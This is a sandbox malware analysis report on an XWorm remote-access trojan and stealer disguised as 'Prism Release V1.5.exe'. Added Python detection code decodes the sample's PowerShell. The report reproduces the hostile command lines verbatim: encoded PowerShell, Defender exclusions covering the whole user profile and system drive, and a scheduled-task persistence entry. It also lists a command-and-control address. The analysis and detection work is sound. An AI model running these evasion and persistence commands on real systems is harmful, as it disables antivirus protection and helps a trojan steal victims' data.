Malware Analysis Report

2024-09-11 13:52

Sample ID: 240615-knlwcavajg
Target: Prism Release V1.5.exe
SHA256: b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
Tags: xworm execution persistence rat trojan spyware stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001

Threat Level: Known bad

The file Prism Release V1.5.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan spyware stealer

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Adds Run key to start application

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: AddClipboardFormatListener

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Kills process with taskkill

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-15 08:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 08:44

Reported

2024-06-15 08:47

Platform

win7-20240611-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Events
PID 2484 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 4
PID 2484 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 4
PID 2484 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe 4
PID 2484 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe 4
PID 2636 wrote to memory of 332 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe 3
PID 2720 wrote to memory of 1784 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3
PID 2720 wrote to memory of 860 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3
PID 2720 wrote to memory of 740 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3
PID 2720 wrote to memory of 1612 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3
PID 2720 wrote to memory of 1748 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe 3
PID 2720 wrote to memory of 1576 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\zohdbc.exe 3
PID 1576 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\zohdbc.exe C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe 3

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

Decoded (-EncodedCommand is base64 over UTF-16LE; the <#...#> block comments are no-op padding): <#ztm#>Add-Type -AssemblyName System.Windows.Forms;<#qzg#>[System.Windows.Forms.MessageBox]::Show('.gg/getprism - Run As Admin If Injection Fails','','OK','Information')<#usd#>
This is the decoy dialog shown to the victim while the other children run.

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

Decoded (-EncodedCommand is base64 over UTF-16LE; the <#...#> block comments are no-op padding): <#ftv#>Add-MpPreference <#fqu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vup#> -Force <#fwa#>
This excludes the whole user profile and the whole system drive from Microsoft Defender scanning; the four per-file exclusions below are added on top of it.

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {564574B8-2846-46D1-A3B6-9AA79E6F5D1E} S-1-5-21-1340930862-1405011213-2821322012-1000:TICCAUTD\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\zohdbc.exe

"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
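The process list above carries the sample's evasion and persistence in plain command lines: two -EncodedCommand launches whose script is only readable after decoding, Add-MpPreference exclusions, a schtasks entry that re-runs "Windows Runtime.exe" every minute at the highest run level, and a binary named dllhost.exe running from the user's profile. The Python below is an added triage example written for this page; it is not code from the report or from the sample. It decodes the encoded commands, strips the <#...#> padding, and runs a handful of rules over process-creation events constructed from the command lines listed above. The two base64 blobs are copied from the report verbatim; PIDs are those in the WriteProcessMemory table, except the taskkill event (behavioral2 gives neither PID nor arguments), whose PID 0 and bare image are placeholders. The rule names and the ProcEvent/Finding types are this example's own.

```python
"""Triage rules for the process tree in this report (added example, not
code from the report or the sample). SAMPLE_EVENTS is constructed from the
command lines in the Processes list; see its comment for assumed values."""
import base64
import re
from dataclasses import dataclass

# <# ... #> is a PowerShell block comment. The dropper inserts random ones
# (<#ztm#>, <#qzg#>) as padding to defeat exact-string signatures.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENCODED_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+\"?([A-Za-z0-9+/=]{20,})", re.I)
# Names that should only ever run from under C:\Windows (T1036.005 masquerading).
SYSTEM_BINARY_NAMES = {"dllhost.exe", "svchost.exe", "explorer.exe", "taskeng.exe"}

# Both blobs copied verbatim from the report's Processes list (behavioral1).
BLOB_MESSAGEBOX = "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
BLOB_DEFENDER_EXCLUSION = "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="


@dataclass
class ProcEvent:
    pid: int
    image: str      # image path as recorded by the sandbox
    cmdline: str    # command line as recorded (may name a different path)


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries the script as base64 over its UTF-16LE bytes."""
    return base64.b64decode(blob).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Remove block-comment padding and collapse the whitespace it leaves."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub("", script)).strip()


def check_event(ev: ProcEvent) -> list:
    """Apply every rule to one process-creation event."""
    findings = []
    name = ev.image.rsplit("\\", 1)[-1].lower()
    text = ev.cmdline
    if name in SYSTEM_BINARY_NAMES and not ev.image.lower().startswith("c:\\windows\\"):
        findings.append(Finding(ev.pid, "system_binary_name_outside_windows_dir", ev.image))
    m = ENCODED_FLAG.search(ev.cmdline)
    if m:
        decoded = deobfuscate(decode_encoded_command(m.group(1)))
        findings.append(Finding(ev.pid, "powershell_encoded_command", decoded))
        text += " " + decoded  # the rules below must see the real script, not the blob
    low = text.lower()
    if "-executionpolicy bypass" in low:
        findings.append(Finding(ev.pid, "execution_policy_bypass", ""))
    if "add-mppreference" in low and "-exclusion" in low:
        findings.append(Finding(ev.pid, "defender_exclusion_added", deobfuscate(text)))
    if name == "schtasks.exe" and "/create" in low and "/rl highest" in low:
        findings.append(Finding(ev.pid, "scheduled_task_highest_runlevel", ev.cmdline))
    if name == "taskkill.exe":
        findings.append(Finding(ev.pid, "taskkill", ev.cmdline))
    return findings


def triage(events) -> dict:
    """pid -> sorted rule names, for every event that tripped at least one rule."""
    hits = {}
    for ev in events:
        rules = sorted({f.rule for f in check_event(ev)})
        if rules:
            hits[ev.pid] = rules
    return hits


PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DLLHOST = r"C:\Users\Admin\dllhost.exe"
PRISM = r"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

# PIDs 2484, 1768, 2428, 2720, 1784 and 1748 come from the report's
# WriteProcessMemory table. The 32-bit parent's PowerShell children run from
# SysWOW64 although their command line says System32, exactly as recorded.
# The taskkill event has no PID or arguments in the report: placeholders.
SAMPLE_EVENTS = [
    ProcEvent(2484, PRISM, f'"{PRISM}"'),
    ProcEvent(1768, PS32, f'"{PS64}" -EncodedCommand "{BLOB_MESSAGEBOX}"'),
    ProcEvent(2428, PS32, f'"{PS64}" -EncodedCommand "{BLOB_DEFENDER_EXCLUSION}"'),
    ProcEvent(2720, DLLHOST, f'"{DLLHOST}"'),
    ProcEvent(1784, PS64, f"\"{PS64}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '{DLLHOST}'"),
    ProcEvent(1748, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"'),
    ProcEvent(0, r"C:\Windows\system32\taskkill.exe", r'"C:\Windows\system32\taskkill.exe"'),
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Two design points worth noting. The encoded-command rule feeds its decoded text back into the remaining rules, so the Defender exclusion hidden in PID 2428 is flagged just like the plain-text one in PID 1784; a detector that only matches on the raw command line misses it. And the masquerading rule keys on image path rather than command line, because the report shows the sandbox records those two differently for the SysWOW64 redirected PowerShell children.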

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.92.241.69:5555 N/A tcp

Files

\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 6cc5f2687f2a665534a9c9d2c2c5d571
SHA1 57e8376734a36ec45383c559d8e01a2b5be0bec7
SHA256 b8bea798f9af6c4e33c329cfbba6836289399112c155de53c69448e442430a70
SHA512 ff47f6dba9fe13b36590b0ab0659f13d4f131c9c2060bbc20718ac8323f917a788f5f8eb7e0f23374452f4a1446f82afc5dff2935ef9e88879d08a40e837964f

\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp

\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe

MD5 58545dc488990ac11872079d119f8284
SHA1 dade5c16834d582a5187041697cc5a7c2eae2f88
SHA256 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
SHA512 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

memory/1784-954-0x000000001B730000-0x000000001BA12000-memory.dmp

memory/1784-955-0x00000000020C0000-0x00000000020C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7a9d1c19cacd312219e8b3f263b6e98d
SHA1 4b5eec3c52faa2ba8e8ff52444fe8b37675f6750
SHA256 8858d129f3fe4908517468c7f7e0dba6229d3474df036d53da3f1032765660ad
SHA512 b89d523b9ee18c764dd3ca4d4f52897315f46d2384a2548f82352dc1a4c4f2e0eeace7451e337c89a21079ead7144e601d16c7546dddae557c018aa907ff2e06

\Users\Admin\AppData\Local\Temp\zohdbc.exe

MD5 32004d8a59efe46298e06798a1a96cb9
SHA1 da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
SHA256 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
SHA512 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe

MD5 473d542fefe26be37736dc09341747bf
SHA1 359cadaafa2f5c032cc300a9097467de701a816c
SHA256 f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc
SHA512 01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16
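The two Temp directories in the Files table, onefile_2636_133629147179158000 and onefile_1576_133629147928502000, together with the dropped python310.dll, match Nuitka's onefile layout: the bootstrap unpacks a compiled Python 3.10 program into onefile_<PID>_<TIME> under %TEMP% and re-launches it with its own arguments, which is consistent with nexusloader.exe and the Temp svchost.exe appearing in the Processes list under their parents' command lines. The Python below is an added example, not part of the report, that recovers the parent PID and the launch time from such a path. Reading <TIME> as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) is this example's assumption, not something the report states; it checks out against the page, giving 2024-06-15 08:45:17 UTC, about a minute after the 08:44 submission, and the recovered PIDs 2636 and 1576 match the writer PIDs in the WriteProcessMemory table.

```python
"""Decode Nuitka onefile extraction paths (added example, not part of the
report). Interpreting the second number as a Windows FILETIME is the
example's assumption; check_parent() and the submission time in the report
are the cross-checks that support it."""
import re
from datetime import datetime, timedelta, timezone

ONEFILE_DIR = re.compile(r"onefile_(\d+)_(\d+)", re.I)
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601; timedelta wants microseconds."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_onefile_path(path: str):
    """Return parent PID, launch time and payload name, or None for other paths."""
    m = ONEFILE_DIR.search(path)
    if not m:
        return None
    started = filetime_to_datetime(int(m.group(2)))
    return {
        "parent_pid": int(m.group(1)),
        "started_utc": started,
        "started_iso": started.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "payload": path.rsplit("\\", 1)[-1],
    }


def check_parent(path: str, writer_pid: int) -> bool:
    """The onefile bootstrap is the process that writes the child's memory,
    so the PID in the directory name must equal the WriteProcessMemory writer."""
    info = parse_onefile_path(path)
    return info is not None and info["parent_pid"] == writer_pid


# Paths copied from the report's Files table (behavioral1).
NEXUSLOADER = r"C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe"
SVCHOST = r"C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe"

if __name__ == "__main__":
    for p in (NEXUSLOADER, SVCHOST):
        info = parse_onefile_path(p)
        print(info["parent_pid"], info["started_iso"], info["payload"])
```

The timestamps give an ordering the report's tables do not: nexusloader.exe was unpacked first and the Temp svchost.exe about 75 seconds later, after dllhost.exe had spawned zohdbc.exe. Both payload names (nexusloader.exe, svchost.exe) sit in a user-writable Temp directory, so the same "system binary name outside C:\Windows" check that catches C:\Users\Admin\dllhost.exe catches the second one.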

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 08:44

Reported

2024-06-15 08:47

Platform

win10v2004-20240226-en

Max time kernel

107s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\dllhost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Loads dropped DLL

Description Indicator Process Target Events
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A 5
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe N/A 59

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target Events
N/A N/A C:\Windows\system32\taskkill.exe N/A 64

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe N/A
